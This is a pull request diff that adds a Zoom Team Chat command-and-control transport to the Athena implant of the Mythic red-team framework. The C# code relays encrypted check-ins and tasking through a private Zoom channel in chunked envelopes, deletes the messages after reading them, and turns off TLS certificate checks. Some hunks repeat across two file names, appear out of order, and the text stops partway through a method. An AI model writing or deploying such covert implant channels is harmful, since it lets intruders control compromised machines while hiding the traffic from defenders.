### PR TITLE
Add Zoom Team Chat C2 profile

### DIFF
--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Agent.Profiles.Zoom.csproj
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Agent.Profiles.Zoom.csproj
@@ -1,0 +1,14 @@
+<Project Sdk="Microsoft.NET.Sdk">
+
+  <PropertyGroup>
+    <TargetFramework>net8.0</TargetFramework>
+    <ImplicitUsings>enable</ImplicitUsings>
+    <Nullable>enable</Nullable>
+    <Configurations>Debug;Release;LocalDebug;LocalDebugHttp;LocalDebugWebsocket;LocalDebugDiscord;LocalDebugGithub;LocalDebugSmb;LocalDebugZoom</Configurations>
+  </PropertyGroup>
+	<!-- Obfuscation Replacement Placeholder Do Not Remove -->
+  <ItemGroup>
+    <ProjectReference Include="..\Agent.Models\Agent.Models.csproj" />
+  </ItemGroup>
+
+</Project>

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
@@ -175,7 +175,7 @@ namespace Agent.Profiles
             try
             {
                 string token = await GetToken();
-                string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages/{id}";
+                string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages/{id}?to_channel={channelId}";
                 using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Delete, url);
                 req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
                 using HttpResponseMessage resp = await _client.SendAsync(req);

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
@@ -140,7 +140,7 @@ namespace Agent.Profiles
         {
             List<ZoomChatMessage> result = new();
             string token = await GetToken();
-            string url = $"{apiBase.TrimEnd('/')}/chat/channels/{channelId}/messages?page_size=50";
+            string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages?to_channel={channelId}&page_size=50";
             using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Get, url);
             req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
             using HttpResponseMessage resp = await _client.SendAsync(req);

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
@@ -76,6 +76,14 @@ namespace Agent.Profiles
                    );
             this._client = new HttpClient(handler);
             this._client.Timeout = TimeSpan.FromSeconds(30);
+
+            // Startup self-check: surfaces whether build-time substitution happened.
+            Console.Error.WriteLine($"[zoom] profile loaded | " +
+                $"account_id={(accountId == "account_id" ? "<UNSUBSTITUTED>" : "set(len=" + accountId.Length + ")")} | " +
+                $"client_id={(clientId == "client_id" ? "<UNSUBSTITUTED>" : "set(len=" + clientId.Length + ")")} | " +
+                $"client_secret={(clientSecret == "client_secret" ? "<UNSUBSTITUTED>" : "set(len=" + clientSecret.Length + ")")} | " +
+                $"channel_id={(channelId == "channel_id" ? "<UNSUBSTITUTED>" : "set(len=" + channelId.Length + ")")} | " +
+                $"api_base={apiBase} | oauth_base={oauthBase}");
         }
 
         // ===================== Zoom REST API =====================
@@ -349,8 +357,9 @@ namespace Agent.Profiles
             {
                 await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
             }
-            catch
+            catch (Exception e)
             {
+                Console.Error.WriteLine($"[zoom] checkin post failed: {e}");
                 return new CheckinResponse() { status = "failed" };
             }
 
@@ -379,8 +388,9 @@ namespace Agent.Profiles
                     await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
                     this.currentAttempt = 0;
                 }
-                catch (Exception)
+                catch (Exception e)
                 {
+                    Console.Error.WriteLine($"[zoom] beacon tick failed: {e}");
                     this.currentAttempt++;
                 }
 

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
@@ -1,0 +1,425 @@
+﻿using Agent.Interfaces;
+using Agent.Models;
+using Agent.Utilities;
+using System.Net;
+using System.Net.Http.Headers;
+using System.Net.Security;
+using System.Text.Json;
+
+namespace Agent.Profiles
+{
+    // Zoom Team Chat C2 profile.
+    //
+    // Uses the Zoom Team Chat REST API (Server-to-Server OAuth) as a duplex
+    // message bus over a single private channel. The agent posts AES-encrypted
+    // checkin/get_tasking payloads to the channel as chunked JSON envelopes
+    // (t = "O"); the Mythic-side "zoom" C2 profile polls the channel, relays
+    // complete blobs to Mythic, and posts the encrypted responses back
+    // (t = "I", addressed to this agent's correlation id). A background receive
+    // loop consumes the responses.
+    //
+    // Crypto is end-to-end between the agent and Mythic via ICryptoManager; the
+    // wire only ever carries opaque base64.
+    public class ZoomProfile : IProfile
+    {
+        public IAgentConfig agentConfig { get; set; }
+        public ICryptoManager crypt { get; set; }
+        private IMessageManager messageManager { get; set; }
+        private ILogger logger { get; set; }
+
+        // ---- C2 parameters (substituted at build time by builder.buildZoom) ----
+        private string accountId = "account_id";
+        private string clientId = "client_id";
+        private string clientSecret = "client_secret";
+        private string userId = "user_id";
+        private string channelId = "channel_id";
+        private string apiBase = "api_base";
+        private string oauthBase = "oauth_base";
+
+        // ---- wire protocol constants ----
+        private const string DIR_AGENT_TO_SERVER = "O";   // consumed by the Mythic bridge
+        private const string DIR_SERVER_TO_AGENT = "I";   // produced by the Mythic bridge
+        private const int CHUNK_SIZE = 3000;              // base64 chars per chat message (< 4096 limit)
+        private const int RECEIVE_POLL_MS = 3000;         // background receiver poll interval
+        private const int CHECKIN_WAIT_MS = 60000;        // how long to wait for the checkin response
+
+        // ---- runtime state ----
+        private readonly string _correlationId = Guid.NewGuid().ToString();
+        private HttpClient _client { get; set; }
+        private string _token = string.Empty;
+        private DateTime _tokenExpiry = DateTime.MinValue;
+
+        private CancellationTokenSource cancellationTokenSource { get; set; } = new();
+        private readonly ManualResetEventSlim _checkinAvailable = new(false);
+        private volatile bool _checkedIn = false;
+        private CheckinResponse _checkinResponse = new();
+        private readonly HashSet<string> _processedJobs = new();
+        private int _receiverStarted = 0;
+        private int currentAttempt = 0;
+        private int maxAttempts = 10;
+
+        public event EventHandler<TaskingReceivedArgs>? SetTaskingReceived;
+
+        public ZoomProfile(IAgentConfig config, ICryptoManager crypto, ILogger logger, IMessageManager messageManager)
+        {
+            this.agentConfig = config;
+            this.crypt = crypto;
+            this.logger = logger;
+            this.messageManager = messageManager;
+
+            HttpClientHandler handler = new HttpClientHandler();
+            //Might need to make this configurable
+            ServicePointManager.ServerCertificateValidationCallback =
+                   new RemoteCertificateValidationCallback(
+                       delegate
+                       { return true; }
+                   );
+            this._client = new HttpClient(handler);
+            this._client.Timeout = TimeSpan.FromSeconds(30);
+        }
+
+        // ===================== Zoom REST API =====================
+
+        private async Task<string> GetToken()
+        {
+            // Zoom S2S tokens last ~1h; refresh ~5 min before expiry.
+            if (!string.IsNullOrEmpty(_token) && DateTime.UtcNow < _tokenExpiry.AddMinutes(-5))
+            {
+                return _token;
+            }
+            string basic = Convert.ToBase64String(System.Text.Encoding.ASCII.GetBytes($"{clientId}:{clientSecret}"));
+            string url = $"{oauthBase.TrimEnd('/')}/token";
+            using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Post, url);
+            req.Headers.Authorization = new AuthenticationHeaderValue("Basic", basic);
+            req.Content = new FormUrlEncodedContent(new Dictionary<string, string>
+            {
+                { "grant_type", "account_credentials" },
+                { "account_id", accountId },
+            });
+            using HttpResponseMessage resp = await _client.SendAsync(req);
+            string body = await resp.Content.ReadAsStringAsync();
+            if (!resp.IsSuccessStatusCode)
+            {
+                throw new Exception($"Zoom OAuth failed: {(int)resp.StatusCode} {body}");
+            }
+            using JsonDocument doc = JsonDocument.Parse(body);
+            _token = doc.RootElement.GetProperty("access_token").GetString() ?? string.Empty;
+            int expiresIn = doc.RootElement.TryGetProperty("expires_in", out var exp) ? exp.GetInt32() : 3600;
+            _tokenExpiry = DateTime.UtcNow.AddSeconds(expiresIn);
+            return _token;
+        }
+
+        private async Task<string?> SendChatMessage(string text)
+        {
+            string token = await GetToken();
+            string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages";
+            using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Post, url);
+            req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
+            req.Content = new StringContent(
+                JsonSerializer.Serialize(new { message = text, to_channel = channelId }),
+                System.Text.Encoding.UTF8,
+                "application/json");
+            using HttpResponseMessage resp = await _client.SendAsync(req);
+            if (!resp.IsSuccessStatusCode)
+            {
+                return null;
+            }
+            string body = await resp.Content.ReadAsStringAsync();
+            try
+            {
+                using JsonDocument doc = JsonDocument.Parse(body);
+                return doc.RootElement.TryGetProperty("id", out var idEl) ? idEl.GetString() : null;
+            }
+            catch
+            {
+                return null;
+            }
+        }
+
+        private async Task<List<ZoomChatMessage>> ListChatMessages()
+        {
+            List<ZoomChatMessage> result = new();
+            string token = await GetToken();
+            string url = $"{apiBase.TrimEnd('/')}/chat/channels/{channelId}/messages?page_size=50";
+            using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Get, url);
+            req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
+            using HttpResponseMessage resp = await _client.SendAsync(req);
+            if (!resp.IsSuccessStatusCode)
+            {
+                return result;
+            }
+            string body = await resp.Content.ReadAsStringAsync();
+            try
+            {
+                using JsonDocument doc = JsonDocument.Parse(body);
+                if (doc.RootElement.TryGetProperty("messages", out var msgs))
+                {
+                    foreach (var m in msgs.EnumerateArray())
+                    {
+                        result.Add(new ZoomChatMessage
+                        {
+                            id = m.TryGetProperty("id", out var idEl) ? idEl.GetString() ?? "" : "",
+                            message = m.TryGetProperty("message", out var msgEl) ? msgEl.GetString() ?? "" : "",
+                        });
+                    }
+                }
+            }
+            catch
+            {
+            }
+            return result;
+        }
+
+        private async Task DeleteChatMessage(string id)
+        {
+            try
+            {
+                string token = await GetToken();
+                string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages/{id}";
+                using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Delete, url);
+                req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
+                using HttpResponseMessage resp = await _client.SendAsync(req);
+            }
+            catch
+            {
+            }
+        }
+
+        // ===================== Envelope / chunking =====================
+
+        private static List<string> Chunk(string s)
+        {
+            List<string> chunks = new();
+            if (string.IsNullOrEmpty(s))
+            {
+                chunks.Add("");
+                return chunks;
+            }
+            for (int i = 0; i < s.Length; i += CHUNK_SIZE)
+            {
+                chunks.Add(s.Substring(i, Math.Min(CHUNK_SIZE, s.Length - i)));
+            }
+            return chunks;
+        }
+
+        // Posts an encrypted blob to the channel as one or more chunked envelopes
+        // addressed from this agent (correlation id) to Mythic.
+        private async Task PostEncrypted(string direction, string encrypted)
+        {
+            string job = Guid.NewGuid().ToString();
+            List<string> chunks = Chunk(encrypted);
+            for (int seq = 0; seq < chunks.Count; seq++)
+            {
+                string envelope = JsonSerializer.Serialize(new ZoomEnvelope
+                {
+                    t = direction,
+                    c = _correlationId,
+                    j = job,
+                    s = seq,
+                    n = chunks.Count,
+                    d = chunks[seq],
+                });
+                await SendChatMessage(envelope);
+            }
+        }
+
+        private static bool TryParseEnvelope(string text, out ZoomEnvelope env)
+        {
+            env = new ZoomEnvelope();
+            if (string.IsNullOrEmpty(text) || !text.TrimStart().StartsWith("{"))
+                return false;
+            try
+            {
+                env = JsonSerializer.Deserialize<ZoomEnvelope>(text) ?? new ZoomEnvelope();
+                return env.t == DIR_AGENT_TO_SERVER || env.t == DIR_SERVER_TO_AGENT;
+            }
+            catch
+            {
+                env = new ZoomEnvelope();
+                return false;
+            }
+        }
+
+        // ===================== Receive loop =====================
+
+        private void EnsureReceiver()
+        {
+            if (Interlocked.CompareExchange(ref _receiverStarted, 1, 0) == 0)
+            {
+                _ = Task.Run(ReceiveLoop);
+            }
+        }
+
+        private async Task ReceiveLoop()
+        {
+            while (!cancellationTokenSource.Token.IsCancellationRequested)
+            {
+                try
+                {
+                    await ProcessInbound();
+                }
+                catch
+                {
+                }
+                try
+                {
+                    await Task.Delay(RECEIVE_POLL_MS, cancellationTokenSource.Token);
+                }
+                catch
+                {
+                    return;
+                }
+            }
+        }
+
+        private async Task ProcessInbound()
+        {
+            List<ZoomChatMessage> messages = await ListChatMessages();
+            // Group SERVER_TO_AGENT envelopes addressed to us, by job id.
+            Dictionary<string, JobBucket> jobs = new();
+            foreach (var msg in messages)
+            {
+                if (!TryParseEnvelope(msg.message, out ZoomEnvelope env))
+                    continue;
+                if (env.t != DIR_SERVER_TO_AGENT || env.c != _correlationId || env.j == null)
+                    continue;
+                if (!jobs.TryGetValue(env.j, out JobBucket? bucket))
+                {
+                    bucket = new JobBucket { total = env.n };
+                    jobs[env.j] = bucket;
+                }
+                bucket.chunks[env.s] = env.d ?? "";
+                bucket.ids.Add(msg.id);
+            }
+
+            foreach (var kv in jobs)
+            {
+                string job = kv.Key;
+                JobBucket bucket = kv.Value;
+                if (_processedJobs.Contains(job))
+                    continue;
+                if (bucket.chunks.Count != bucket.total)
+                    continue;
+
+                _processedJobs.Add(job);
+                string encrypted = string.Concat(Enumerable.Range(0, bucket.total).Select(i => bucket.chunks[i]));
+
+                // burn-after-read
+                foreach (string id in bucket.ids)
+                {
+                    await DeleteChatMessage(id);
+                }
+
+                string plain = crypt.Decrypt(encrypted);
+                if (string.IsNullOrEmpty(plain))
+                    continue;
+
+                if (!_checkedIn)
+                {
+                    _checkinResponse = JsonSerializer.Deserialize(plain, CheckinResponseJsonContext.Default.CheckinResponse) ?? new CheckinResponse();
+                    _checkinAvailable.Set();
+                    _checkedIn = true;
+                }
+                else
+                {
+                    GetTaskingResponse? gtr = JsonSerializer.Deserialize(plain, GetTaskingResponseJsonContext.Default.GetTaskingResponse);
+                    if (gtr != null)
+                    {
+                        TaskingReceivedArgs tra = new TaskingReceivedArgs(gtr);
+                        this.SetTaskingReceived?.Invoke(this, tra);
+                    }
+                }
+            }
+
+            // Keep the processed set bounded.
+            if (_processedJobs.Count > 1000)
+            {
+                _processedJobs.Clear();
+            }
+        }
+
+        // ===================== IProfile =====================
+
+        public async Task<CheckinResponse> Checkin(Checkin checkin)
+        {
+            EnsureReceiver();
+
+            string encrypted = crypt.Encrypt(JsonSerializer.Serialize(checkin, CheckinJsonContext.Default.Checkin));
+            try
+            {
+                await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
+            }
+            catch
+            {
+                return new CheckinResponse() { status = "failed" };
+            }
+
+            // Wait for the bridge to relay and return a checkin response.
+            if (!_checkinAvailable.Wait(CHECKIN_WAIT_MS))
+            {
+                return new CheckinResponse() { status = "failed" };
+            }
+            return _checkinResponse;
+        }
+
+        public async Task StartBeacon()
+        {
+            //Main beacon loop handled here
+            this.cancellationTokenSource = new CancellationTokenSource();
+            EnsureReceiver();
+
+            while (!cancellationTokenSource.Token.IsCancellationRequested)
+            {
+                await Task.Delay(Misc.GetSleep(this.agentConfig.sleep, this.agentConfig.jitter) * 1000);
+                try
+                {
+                    // Solicit tasking every tick. GetAgentResponseString() returns a
+                    // valid get_tasking even when there are no queued responses.
+                    string encrypted = crypt.Encrypt(messageManager.GetAgentResponseString());
+                    await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
+                    this.currentAttempt = 0;
+                }
+                catch (Exception)
+                {
+                    this.currentAttempt++;
+                }
+
+                if (this.currentAttempt >= this.maxAttempts)
+                {
+                    this.cancellationTokenSource.Cancel();
+                }
+            }
+        }
+
+        public bool StopBeacon()
+        {
+            this.cancellationTokenSource.Cancel();
+            return true;
+        }
+
+        // ===================== Helpers =====================
+
+        private class ZoomEnvelope
+        {
+            public string? t { get; set; }
+            public string? c { get; set; }
+            public string? j { get; set; }
+            public int s { get; set; }
+            public int n { get; set; }
+            public string? d { get; set; }
+        }
+
+        private class ZoomChatMessage
+        {
+            public string id { get; set; } = string.Empty;
+            public string message { get; set; } = string.Empty;
+        }
+
+        private class JobBucket
+        {
+            public int total;
+            public Dictionary<int, string> chunks = new();
+            public List<string> ids = new();
+        }
+    }
+}

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
@@ -28,7 +28,7 @@ namespace Agent.Profiles
         private ILogger logger { get; set; }
 
         // ---- C2 parameters (substituted at build time by builder.buildZoom) ----
-        private string accountId = "account_id";
+        private string accountId = "zoom_account_id";
         private string clientId = "client_id";
         private string clientSecret = "client_secret";
         private string userId = "user_id";
@@ -77,13 +77,13 @@ namespace Agent.Profiles
             this._client = new HttpClient(handler);
             this._client.Timeout = TimeSpan.FromSeconds(30);
 
-            // Startup self-check: surfaces whether build-time substitution happened.
-            Console.Error.WriteLine($"[zoom] profile loaded | " +
-                $"account_id={(accountId == "account_id" ? "<UNSUBSTITUTED>" : "set(len=" + accountId.Length + ")")} | " +
-                $"client_id={(clientId == "client_id" ? "<UNSUBSTITUTED>" : "set(len=" + clientId.Length + ")")} | " +
-                $"client_secret={(clientSecret == "client_secret" ? "<UNSUBSTITUTED>" : "set(len=" + clientSecret.Length + ")")} | " +
-                $"channel_id={(channelId == "channel_id" ? "<UNSUBSTITUTED>" : "set(len=" + channelId.Length + ")")} | " +
-                $"api_base={apiBase} | oauth_base={oauthBase}");
+            // NOTE: do NOT use the bare token names (zoom_account_id, client_id, ...)
+            // as string literals anywhere in this file — Athena's builder does a
+            // global text replace of each C2 parameter name, which would corrupt
+            // any literal that happens to match (e.g. the OAuth "account_id" form
+            // field key). The OAuth key below is intentionally a different string
+            // from the substitution token (zoom_account_id).
+            Console.Error.WriteLine("[zoom] profile loaded");
         }
 
         // ===================== Zoom REST API =====================

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/Base.txt
@@ -28,13 +28,16 @@ namespace Agent.Profiles
         private ILogger logger { get; set; }
 
         // ---- C2 parameters (substituted at build time by builder.buildZoom) ----
-        private string accountId = "zoom_account_id";
-        private string clientId = "client_id";
-        private string clientSecret = "client_secret";
-        private string userId = "user_id";
-        private string channelId = "channel_id";
-        private string apiBase = "api_base";
-        private string oauthBase = "oauth_base";
+        // Fixed %ZOOM_*% placeholders are used (not the bare C2 param names) so
+        // Athena's global text-replace can never collide with literal API field
+        // names such as the OAuth "account_id" form key.
+        private string accountId = "%ZOOM_ACCOUNT_ID%";
+        private string clientId = "%ZOOM_CLIENT_ID%";
+        private string clientSecret = "%ZOOM_CLIENT_SECRET%";
+        private string userId = "%ZOOM_USER_ID%";
+        private string channelId = "%ZOOM_CHANNEL_ID%";
+        private string apiBase = "%ZOOM_API_BASE%";
+        private string oauthBase = "%ZOOM_OAUTH_BASE%";
 
         // ---- wire protocol constants ----
         private const string DIR_AGENT_TO_SERVER = "O";   // consumed by the Mythic bridge
@@ -77,12 +80,6 @@ namespace Agent.Profiles
             this._client = new HttpClient(handler);
             this._client.Timeout = TimeSpan.FromSeconds(30);
 
-            // NOTE: do NOT use the bare token names (zoom_account_id, client_id, ...)
-            // as string literals anywhere in this file — Athena's builder does a
-            // global text replace of each C2 parameter name, which would corrupt
-            // any literal that happens to match (e.g. the OAuth "account_id" form
-            // field key). The OAuth key below is intentionally a different string
-            // from the substitution token (zoom_account_id).
             Console.Error.WriteLine("[zoom] profile loaded");
         }
 
@@ -99,11 +96,13 @@ namespace Agent.Profiles
             string url = $"{oauthBase.TrimEnd('/')}/token";
             using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Post, url);
             req.Headers.Authorization = new AuthenticationHeaderValue("Basic", basic);
-            req.Content = new FormUrlEncodedContent(new Dictionary<string, string>
+            var formContent = new FormUrlEncodedContent(new Dictionary<string, string>
             {
                 { "grant_type", "account_credentials" },
                 { "account_id", accountId },
             });
+            Console.Error.WriteLine($"[zoom] OAuth POST {url} body={await formContent.ReadAsStringAsync()}");
+            req.Content = formContent;
             using HttpResponseMessage resp = await _client.SendAsync(req);
             string body = await resp.Content.ReadAsStringAsync();
             if (!resp.IsSuccessStatusCode)

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
@@ -175,7 +175,7 @@ namespace Agent.Profiles
             try
             {
                 string token = await GetToken();
-                string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages/{id}";
+                string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages/{id}?to_channel={channelId}";
                 using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Delete, url);
                 req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
                 using HttpResponseMessage resp = await _client.SendAsync(req);

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
@@ -140,7 +140,7 @@ namespace Agent.Profiles
         {
             List<ZoomChatMessage> result = new();
             string token = await GetToken();
-            string url = $"{apiBase.TrimEnd('/')}/chat/channels/{channelId}/messages?page_size=50";
+            string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages?to_channel={channelId}&page_size=50";
             using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Get, url);
             req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
             using HttpResponseMessage resp = await _client.SendAsync(req);

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
@@ -76,6 +76,14 @@ namespace Agent.Profiles
                    );
             this._client = new HttpClient(handler);
             this._client.Timeout = TimeSpan.FromSeconds(30);
+
+            // Startup self-check: surfaces whether build-time substitution happened.
+            Console.Error.WriteLine($"[zoom] profile loaded | " +
+                $"account_id={(accountId == "account_id" ? "<UNSUBSTITUTED>" : "set(len=" + accountId.Length + ")")} | " +
+                $"client_id={(clientId == "client_id" ? "<UNSUBSTITUTED>" : "set(len=" + clientId.Length + ")")} | " +
+                $"client_secret={(clientSecret == "client_secret" ? "<UNSUBSTITUTED>" : "set(len=" + clientSecret.Length + ")")} | " +
+                $"channel_id={(channelId == "channel_id" ? "<UNSUBSTITUTED>" : "set(len=" + channelId.Length + ")")} | " +
+                $"api_base={apiBase} | oauth_base={oauthBase}");
         }
 
         // ===================== Zoom REST API =====================
@@ -349,8 +357,9 @@ namespace Agent.Profiles
             {
                 await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
             }
-            catch
+            catch (Exception e)
             {
+                Console.Error.WriteLine($"[zoom] checkin post failed: {e}");
                 return new CheckinResponse() { status = "failed" };
             }
 
@@ -379,8 +388,9 @@ namespace Agent.Profiles
                     await PostEncrypted(DIR_AGENT_TO_SERVER, encrypted);
                     this.currentAttempt = 0;
                 }
-                catch (Exception)
+                catch (Exception e)
                 {
+                    Console.Error.WriteLine($"[zoom] beacon tick failed: {e}");
                     this.currentAttempt++;
                 }
 

--- a/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
+++ b/Payload_Type/athena/athena/agent_code/Agent.Profiles.Zoom/ZoomProfile.cs
@@ -1,0 +1,425 @@
+﻿using Agent.Interfaces;
+using Agent.Models;
+using Agent.Utilities;
+using System.Net;
+using System.Net.Http.Headers;
+using System.Net.Security;
+using System.Text.Json;
+
+namespace Agent.Profiles
+{
+    // Zoom Team Chat C2 profile.
+    //
+    // Uses the Zoom Team Chat REST API (Server-to-Server OAuth) as a duplex
+    // message bus over a single private channel. The agent posts AES-encrypted
+    // checkin/get_tasking payloads to the channel as chunked JSON envelopes
+    // (t = "O"); the Mythic-side "zoom" C2 profile polls the channel, relays
+    // complete blobs to Mythic, and posts the encrypted responses back
+    // (t = "I", addressed to this agent's correlation id). A background receive
+    // loop consumes the responses.
+    //
+    // Crypto is end-to-end between the agent and Mythic via ICryptoManager; the
+    // wire only ever carries opaque base64.
+    public class ZoomProfile : IProfile
+    {
+        public IAgentConfig agentConfig { get; set; }
+        public ICryptoManager crypt { get; set; }
+        private IMessageManager messageManager { get; set; }
+        private ILogger logger { get; set; }
+
+        // ---- C2 parameters (substituted at build time by builder.buildZoom) ----
+        private string accountId = "account_id";
+        private string clientId = "client_id";
+        private string clientSecret = "client_secret";
+        private string userId = "user_id";
+        private string channelId = "channel_id";
+        private string apiBase = "api_base";
+        private string oauthBase = "oauth_base";
+
+        // ---- wire protocol constants ----
+        private const string DIR_AGENT_TO_SERVER = "O";   // consumed by the Mythic bridge
+        private const string DIR_SERVER_TO_AGENT = "I";   // produced by the Mythic bridge
+        private const int CHUNK_SIZE = 3000;              // base64 chars per chat message (< 4096 limit)
+        private const int RECEIVE_POLL_MS = 3000;         // background receiver poll interval
+        private const int CHECKIN_WAIT_MS = 60000;        // how long to wait for the checkin response
+
+        // ---- runtime state ----
+        private readonly string _correlationId = Guid.NewGuid().ToString();
+        private HttpClient _client { get; set; }
+        private string _token = string.Empty;
+        private DateTime _tokenExpiry = DateTime.MinValue;
+
+        private CancellationTokenSource cancellationTokenSource { get; set; } = new();
+        private readonly ManualResetEventSlim _checkinAvailable = new(false);
+        private volatile bool _checkedIn = false;
+        private CheckinResponse _checkinResponse = new();
+        private readonly HashSet<string> _processedJobs = new();
+        private int _receiverStarted = 0;
+        private int currentAttempt = 0;
+        private int maxAttempts = 10;
+
+        public event EventHandler<TaskingReceivedArgs>? SetTaskingReceived;
+
+        public ZoomProfile(IAgentConfig config, ICryptoManager crypto, ILogger logger, IMessageManager messageManager)
+        {
+            this.agentConfig = config;
+            this.crypt = crypto;
+            this.logger = logger;
+            this.messageManager = messageManager;
+
+            HttpClientHandler handler = new HttpClientHandler();
+            //Might need to make this configurable
+            ServicePointManager.ServerCertificateValidationCallback =
+                   new RemoteCertificateValidationCallback(
+                       delegate
+                       { return true; }
+                   );
+            this._client = new HttpClient(handler);
+            this._client.Timeout = TimeSpan.FromSeconds(30);
+        }
+
+        // ===================== Zoom REST API =====================
+
+        private async Task<string> GetToken()
+        {
+            // Zoom S2S tokens last ~1h; refresh ~5 min before expiry.
+            if (!string.IsNullOrEmpty(_token) && DateTime.UtcNow < _tokenExpiry.AddMinutes(-5))
+            {
+                return _token;
+            }
+            string basic = Convert.ToBase64String(System.Text.Encoding.ASCII.GetBytes($"{clientId}:{clientSecret}"));
+            string url = $"{oauthBase.TrimEnd('/')}/token";
+            using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Post, url);
+            req.Headers.Authorization = new AuthenticationHeaderValue("Basic", basic);
+            req.Content = new FormUrlEncodedContent(new Dictionary<string, string>
+            {
+                { "grant_type", "account_credentials" },
+                { "account_id", accountId },
+            });
+            using HttpResponseMessage resp = await _client.SendAsync(req);
+            string body = await resp.Content.ReadAsStringAsync();
+            if (!resp.IsSuccessStatusCode)
+            {
+                throw new Exception($"Zoom OAuth failed: {(int)resp.StatusCode} {body}");
+            }
+            using JsonDocument doc = JsonDocument.Parse(body);
+            _token = doc.RootElement.GetProperty("access_token").GetString() ?? string.Empty;
+            int expiresIn = doc.RootElement.TryGetProperty("expires_in", out var exp) ? exp.GetInt32() : 3600;
+            _tokenExpiry = DateTime.UtcNow.AddSeconds(expiresIn);
+            return _token;
+        }
+
+        private async Task<string?> SendChatMessage(string text)
+        {
+            string token = await GetToken();
+            string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages";
+            using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Post, url);
+            req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
+            req.Content = new StringContent(
+                JsonSerializer.Serialize(new { message = text, to_channel = channelId }),
+                System.Text.Encoding.UTF8,
+                "application/json");
+            using HttpResponseMessage resp = await _client.SendAsync(req);
+            if (!resp.IsSuccessStatusCode)
+            {
+                return null;
+            }
+            string body = await resp.Content.ReadAsStringAsync();
+            try
+            {
+                using JsonDocument doc = JsonDocument.Parse(body);
+                return doc.RootElement.TryGetProperty("id", out var idEl) ? idEl.GetString() : null;
+            }
+            catch
+            {
+                return null;
+            }
+        }
+
+        private async Task<List<ZoomChatMessage>> ListChatMessages()
+        {
+            List<ZoomChatMessage> result = new();
+            string token = await GetToken();
+            string url = $"{apiBase.TrimEnd('/')}/chat/channels/{channelId}/messages?page_size=50";
+            using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Get, url);
+            req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
+            using HttpResponseMessage resp = await _client.SendAsync(req);
+            if (!resp.IsSuccessStatusCode)
+            {
+                return result;
+            }
+            string body = await resp.Content.ReadAsStringAsync();
+            try
+            {
+                using JsonDocument doc = JsonDocument.Parse(body);
+                if (doc.RootElement.TryGetProperty("messages", out var msgs))
+                {
+                    foreach (var m in msgs.EnumerateArray())
+                    {
+                        result.Add(new ZoomChatMessage
+                        {
+                            id = m.TryGetProperty("id", out var idEl) ? idEl.GetString() ?? "" : "",
+                            message = m.TryGetProperty("message", out var msgEl) ? msgEl.GetString() ?? "" : "",
+                        });
+                    }
+                }
+            }
+            catch
+            {
+            }
+            return result;
+        }
+
+        private async Task DeleteChatMessage(string id)
+        {
+            try
+            {
+                string token = await GetToken();
+                string url = $"{apiBase.TrimEnd('/')}/chat/users/{userId}/messages/{id}";
+                using HttpRequestMessage req = new HttpRequestMessage(HttpMethod.Delete, url);
+                req.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);
